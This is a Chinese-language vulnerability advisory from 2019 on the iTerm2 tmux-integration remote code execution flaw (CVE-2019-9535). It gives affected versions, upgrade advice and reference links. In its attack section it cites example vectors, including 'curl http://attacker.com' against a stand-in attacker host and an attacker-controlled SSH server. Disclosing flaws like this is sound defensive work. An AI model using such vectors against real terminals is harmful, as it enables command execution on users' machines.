当前位置:首页 > 安全预警 > 正文

iTerm2远程代码执行漏洞(CVE-2019-9535)预警

发布时间:2019-10-12 11:47:51,来源:中国信息通信研究院

      一、基本情况

iTerm2存在远程代码执行漏洞,CVE编号:CVE-2019-9535。当攻击者可以在用户的终端产生输出时(如ssh、curl等存在信息返回的情况下),便可在用户的计算机上执行命令。

      二、攻击原理

iTerm2是世界上最受欢迎的终端仿真器之一,开发人员经常使用它。MOSS选择了iTerm2进行安全审核,因为它处理不受信任的数据并且被广泛使用,包括高风险目标(如开发人员和系统管理员)。

在审核过程中,发现iTerm2的tmux集成功能存在严重漏洞,此漏洞在iTerm2中存在至少7年了。在许多情况下,可以向终端产生输出的攻击者,可在用户的计算机上执行命令。用于此目的的示例攻击向量将连接到攻击者控制的SSH服务器或诸如curl http://attacker.com和tail -f / var / log / apache2 / referer_log之类的命令。

      三、影响范围

受影响的版本:

iTerm2 < 3.3.5

      四、处置建议

目前官方已发布iTerm2的 3.3.6版本,请升级至该版本。

      五、参考链接

1) https://ffp4g1ylyit3jdyti1hqcvtb-wpengine.netdna-ssl.com/security/files/2019/10/cve-2019-9535.webm?_=3

2) https://nvd.nist.gov/vuln/detail/CVE-2019-9535